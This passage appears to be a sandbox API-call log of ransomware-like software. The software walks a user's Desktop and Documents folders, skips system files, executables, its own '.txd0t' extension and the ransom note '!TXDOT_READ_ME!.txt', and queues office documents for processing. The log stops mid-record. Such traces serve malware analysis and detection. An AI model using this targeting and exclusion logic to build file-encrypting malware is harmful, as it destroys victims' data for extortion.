returned="C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv" [0073.911] PathFindExtensionW (pszPath="ztT1zUqOHSnYLoXvx2_E.csv") returned=".csv" [0073.911] StrCmpW (psz1=".csv", psz2=".txd0t") returned -1 [0073.911] StrCmpIW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2="bootsect.bak") returned 1 [0073.911] StrCmpIW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2="iconcache.db") returned 1 [0073.912] StrCmpIW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2="thumbs.db") returned 1 [0073.912] StrCmpIW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2=" ransomware ") returned 1 [0073.912] StrCmpIW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2=" ransom ") returned 1 [0073.912] StrCmpIW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2="debug.txt") returned 1 [0073.912] StrCmpIW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2="boot.ini") returned 1 [0073.912] StrCmpIW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2="desktop.ini") returned 1 [0073.912] StrCmpIW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2="autorun.inf") returned 1 [0073.912] StrCmpIW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2="ntuser.dat") returned 1 [0073.912] StrCmpIW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2="ntldr") returned 1 [0073.912] StrCmpIW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2="ntdetect.com") returned 1 [0073.912] StrCmpIW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2="bootfont.bin") returned 1 [0073.912] StrCmpIW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.912] PathFindExtensionW (pszPath="ztT1zUqOHSnYLoXvx2_E.csv") returned=".csv" [0073.912] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".csv") returned 0x0 [0073.912] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.912] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.912] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.921] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.921] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv" [0073.922] SetEvent (hEvent=0x418) returned 1 [0073.922] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa54e95c0, ftCreationTime.dwHighDateTime=0x1d5eb66, ftLastAccessTime.dwLowDateTime=0xad201040, ftLastAccessTime.dwHighDateTime=0x1d5e331, ftLastWriteTime.dwLowDateTime=0xad201040, ftLastWriteTime.dwHighDateTime=0x1d5e331, nFileSizeHigh=0x0, nFileSizeLow=0x8f2f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ztT1zUqOHSnYLoXvx2_E.csv", cAlternateFileName="ZTT1ZU~1.CSV")) returned 0 [0073.923] FindClose (in: hFindFile=0xec20f0 | out: hFindFile=0xec20f0) returned 1 [0073.923] GetProcessHeap () returned 0xe30000 [0073.923] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: hHeap=0xe30000) returned 1 [0073.923] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5a7e27c, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5a7e27c, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0073.923] StrCmpW (psz1="Documents", psz2=".") returned 1 [0073.923] StrCmpW (psz1="Documents", psz2="..") returned 1 [0073.923] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0073.923] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0073.923] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Documents", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\system32\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\syswow64\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\system\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\winsxs\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\appdata\\roaming\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\appdata\\local\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\appdata\\locallow\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\all users\\microsoft\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\inetpub\\logs\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\boot\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\perflogs\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\programdata\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\drivers\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\wsus\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\efstmpwp\\") returned 0x0 [0073.923] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\$recycle.bin\\") returned 0x0 [0073.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="crypt_detect") returned 0x0 [0073.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="cryptolocker") returned 0x0 [0073.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="ransomware") returned 0x0 [0073.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="C:\\WINDOWS") returned 0x0 [0073.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="C:\\Program Files (x86)") returned 0x0 [0073.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="C:\\Program Files") returned 0x0 [0073.924] GetProcessHeap () returned 0xe30000 [0073.924] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xed0058 [0073.924] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0073.924] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\*") returned="C:\\Users\\FD1HVy\\Documents\\*" [0073.924] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5a7e27c, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5a7e27c, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2730 [0073.924] StrCmpW (psz1=".", psz2=".") returned 0 [0073.924] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5a7e27c, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5a7e27c, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.924] StrCmpW (psz1="..", psz2=".") returned 1 [0073.924] StrCmpW (psz1="..", psz2="..") returned 0 [0073.924] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26df0010, ftCreationTime.dwHighDateTime=0x1d59cda, ftLastAccessTime.dwLowDateTime=0xd76e9320, ftLastAccessTime.dwHighDateTime=0x1d5dd83, ftLastWriteTime.dwLowDateTime=0xd76e9320, ftLastWriteTime.dwHighDateTime=0x1d5dd83, nFileSizeHigh=0x0, nFileSizeLow=0x9bae, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="-nk0Jwf_DtIx7OFnM.xlsx", cAlternateFileName="-NK0JW~1.XLS")) returned 1 [0073.924] StrCmpW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2=".") returned 1 [0073.924] StrCmpW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2="..") returned 1 [0073.924] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0073.924] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0073.924] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="-nk0Jwf_DtIx7OFnM.xlsx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx") returned="C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx" [0073.924] PathFindExtensionW (pszPath="-nk0Jwf_DtIx7OFnM.xlsx") returned=".xlsx" [0073.924] StrCmpW (psz1=".xlsx", psz2=".txd0t") returned 1 [0073.925] StrCmpIW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2="bootsect.bak") returned 1 [0073.925] StrCmpIW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2="iconcache.db") returned 1 [0073.925] StrCmpIW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2="thumbs.db") returned -1 [0073.925] StrCmpIW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2=" ransomware ") returned 1 [0073.925] StrCmpIW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2=" ransom ") returned 1 [0073.925] StrCmpIW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2="debug.txt") returned 1 [0073.925] StrCmpIW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2="boot.ini") returned 1 [0073.925] StrCmpIW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2="desktop.ini") returned 1 [0073.925] StrCmpIW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2="autorun.inf") returned 1 [0073.925] StrCmpIW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2="ntuser.dat") returned -1 [0073.925] StrCmpIW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2="ntldr") returned -1 [0073.925] StrCmpIW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2="ntdetect.com") returned -1 [0073.925] StrCmpIW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2="bootfont.bin") returned 1 [0073.925] StrCmpIW (psz1="-nk0Jwf_DtIx7OFnM.xlsx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.925] PathFindExtensionW (pszPath="-nk0Jwf_DtIx7OFnM.xlsx") returned=".xlsx" [0073.925] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xlsx") returned 0x0 [0073.925] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.925] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.926] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.934] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.934] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx" [0073.934] SetEvent (hEvent=0x410) returned 1 [0073.934] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd5ddbb0, ftCreationTime.dwHighDateTime=0x1d58f75, ftLastAccessTime.dwLowDateTime=0x9feb6c70, ftLastAccessTime.dwHighDateTime=0x1d57776, ftLastWriteTime.dwLowDateTime=0x9feb6c70, ftLastWriteTime.dwHighDateTime=0x1d57776, nFileSizeHigh=0x0, nFileSizeLow=0xf3c7, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="1WQmayKDv.pptx", cAlternateFileName="1WQMAY~1.PPT")) returned 1 [0073.934] StrCmpW (psz1="1WQmayKDv.pptx", psz2=".") returned 1 [0073.934] StrCmpW (psz1="1WQmayKDv.pptx", psz2="..") returned 1 [0073.934] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0073.934] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0073.934] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="1WQmayKDv.pptx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx") returned="C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx" [0073.934] PathFindExtensionW (pszPath="1WQmayKDv.pptx") returned=".pptx" [0073.934] StrCmpW (psz1=".pptx", psz2=".txd0t") returned -1 [0073.934] StrCmpIW (psz1="1WQmayKDv.pptx", psz2="bootsect.bak") returned -1 [0073.934] StrCmpIW (psz1="1WQmayKDv.pptx", psz2="iconcache.db") returned -1 [0073.934] StrCmpIW (psz1="1WQmayKDv.pptx", psz2="thumbs.db") returned -1 [0073.934] StrCmpIW (psz1="1WQmayKDv.pptx", psz2=" ransomware ") returned 1 [0073.934] StrCmpIW (psz1="1WQmayKDv.pptx", psz2=" ransom ") returned 1 [0073.934] StrCmpIW (psz1="1WQmayKDv.pptx", psz2="debug.txt") returned -1 [0073.934] StrCmpIW (psz1="1WQmayKDv.pptx", psz2="boot.ini") returned -1 [0073.934] StrCmpIW (psz1="1WQmayKDv.pptx", psz2="desktop.ini") returned -1 [0073.935] StrCmpIW (psz1="1WQmayKDv.pptx", psz2="autorun.inf") returned -1 [0073.935] StrCmpIW (psz1="1WQmayKDv.pptx", psz2="ntuser.dat") returned -1 [0073.935] StrCmpIW (psz1="1WQmayKDv.pptx", psz2="ntldr") returned -1 [0073.935] StrCmpIW (psz1="1WQmayKDv.pptx", psz2="ntdetect.com") returned -1 [0073.935] StrCmpIW (psz1="1WQmayKDv.pptx", psz2="bootfont.bin") returned -1 [0073.935] StrCmpIW (psz1="1WQmayKDv.pptx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.935] PathFindExtensionW (pszPath="1WQmayKDv.pptx") returned=".pptx" [0073.935] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pptx") returned 0x0 [0073.935] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.935] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.935] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.942] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.942] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx" [0073.942] SetEvent (hEvent=0x418) returned 1 [0073.942] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe5cd300, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x446fea50, ftLastAccessTime.dwHighDateTime=0x1d59d74, ftLastWriteTime.dwLowDateTime=0x446fea50, ftLastWriteTime.dwHighDateTime=0x1d59d74, nFileSizeHigh=0x0, nFileSizeLow=0x18a63, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="27kj6w0qCAmGPNM.docx", cAlternateFileName="27KJ6W~1.DOC")) returned 1 [0073.942] StrCmpW (psz1="27kj6w0qCAmGPNM.docx", psz2=".") returned 1 [0073.942] StrCmpW (psz1="27kj6w0qCAmGPNM.docx", psz2="..") returned 1 [0073.942] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0073.942] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0073.942] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="27kj6w0qCAmGPNM.docx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx") returned="C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx" [0073.942] PathFindExtensionW (pszPath="27kj6w0qCAmGPNM.docx") returned=".docx" [0073.942] StrCmpW (psz1=".docx", psz2=".txd0t") returned -1 [0073.942] StrCmpIW (psz1="27kj6w0qCAmGPNM.docx", psz2="bootsect.bak") returned -1 [0073.942] StrCmpIW (psz1="27kj6w0qCAmGPNM.docx", psz2="iconcache.db") returned -1 [0073.942] StrCmpIW (psz1="27kj6w0qCAmGPNM.docx", psz2="thumbs.db") returned -1 [0073.942] StrCmpIW (psz1="27kj6w0qCAmGPNM.docx", psz2=" ransomware ") returned 1 [0073.942] StrCmpIW (psz1="27kj6w0qCAmGPNM.docx", psz2=" ransom ") returned 1 [0073.942] StrCmpIW (psz1="27kj6w0qCAmGPNM.docx", psz2="debug.txt") returned -1 [0073.942] StrCmpIW (psz1="27kj6w0qCAmGPNM.docx", psz2="boot.ini") returned -1 [0073.942] StrCmpIW (psz1="27kj6w0qCAmGPNM.docx", psz2="desktop.ini") returned -1 [0073.943] StrCmpIW (psz1="27kj6w0qCAmGPNM.docx", psz2="autorun.inf") returned -1 [0073.943] StrCmpIW (psz1="27kj6w0qCAmGPNM.docx", psz2="ntuser.dat") returned -1 [0073.943] StrCmpIW (psz1="27kj6w0qCAmGPNM.docx", psz2="ntldr") returned -1 [0073.943] StrCmpIW (psz1="27kj6w0qCAmGPNM.docx", psz2="ntdetect.com") returned -1 [0073.943] StrCmpIW (psz1="27kj6w0qCAmGPNM.docx", psz2="bootfont.bin") returned -1 [0073.943] StrCmpIW (psz1="27kj6w0qCAmGPNM.docx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.943] PathFindExtensionW (pszPath="27kj6w0qCAmGPNM.docx") returned=".docx" [0073.943] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".docx") returned 0x0 [0073.943] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.943] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.943] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.956] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.956] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx" [0073.956] SetEvent (hEvent=0x418) returned 1 [0073.956] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb38f350, ftCreationTime.dwHighDateTime=0x1d57bb4, ftLastAccessTime.dwLowDateTime=0xfe7a2f50, ftLastAccessTime.dwHighDateTime=0x1d567f0, ftLastWriteTime.dwLowDateTime=0xfe7a2f50, ftLastWriteTime.dwHighDateTime=0x1d567f0, nFileSizeHigh=0x0, nFileSizeLow=0x1353b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="4oSJqKCx.docx", cAlternateFileName="4OSJQK~1.DOC")) returned 1 [0073.956] StrCmpW (psz1="4oSJqKCx.docx", psz2=".") returned 1 [0073.956] StrCmpW (psz1="4oSJqKCx.docx", psz2="..") returned 1 [0073.956] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0073.956] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0073.956] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="4oSJqKCx.docx", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx") returned="C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx" [0073.957] PathFindExtensionW (pszPath="4oSJqKCx.docx") returned=".docx" [0073.957] StrCmpW (psz1=".docx", psz2=".txd0t") returned -1 [0073.957] StrCmpIW (psz1="4oSJqKCx.docx", psz2="bootsect.bak") returned -1 [0073.957] StrCmpIW (psz1="4oSJqKCx.docx", psz2="iconcache.db") returned -1 [0073.957] StrCmpIW (psz1="4oSJqKCx.docx", psz2="thumbs.db") returned -1 [0073.957] StrCmpIW (psz1="4oSJqKCx.docx", psz2=" ransomware ") returned 1 [0073.957] StrCmpIW (psz1="4oSJqKCx.docx", psz2=" ransom ") returned 1 [0073.957] StrCmpIW (psz1="4oSJqKCx.docx", psz2="debug.txt") returned -1 [0073.957] StrCmpIW (psz1="4oSJqKCx.docx", psz2="boot.ini") returned -1 [0073.957] StrCmpIW (psz1="4oSJqKCx.docx", psz2="desktop.ini") returned -1 [0073.957] StrCmpIW (psz1="4oSJqKCx.docx", psz2="autorun.inf") returned -1 [0073.957] StrCmpIW (psz1="4oSJqKCx.docx", psz2="ntuser.dat") returned -1 [0073.957] StrCmpIW (psz1="4oSJqKCx.docx", psz2="ntldr") returned -1 [0073.957] StrCmpIW (psz1="4oSJqKCx.docx", psz2="ntdetect.com") returned -1 [0073.957] StrCmpIW (psz1="4oSJqKCx.docx", psz2="bootfont.bin") returned -1 [0073.957] StrCmpIW (psz1="4oSJqKCx.docx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.957] PathFindExtensionW (pszPath="4oSJqKCx.docx") returned=".docx" [0073.957] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".docx") returned 0x0 [0073.958] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.958] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.958] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.967] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.968] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx" [0073.968] SetEvent (hEvent=0x410) returned 1 [0073.968] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31841f70, ftCreationTime.dwHighDateTime=0x1d5e5a3, ftLastAccessTime.dwLowDateTime=0xc216dad0, ftLastAccessTime.dwHighDateTime=0x1d5e497, ftLastWriteTime.dwLowDateTime=0xc216dad0, ftLastWriteTime.dwHighDateTime=0x1d5e497, nFileSizeHigh=0x0, nFileSizeLow=0x5e42, 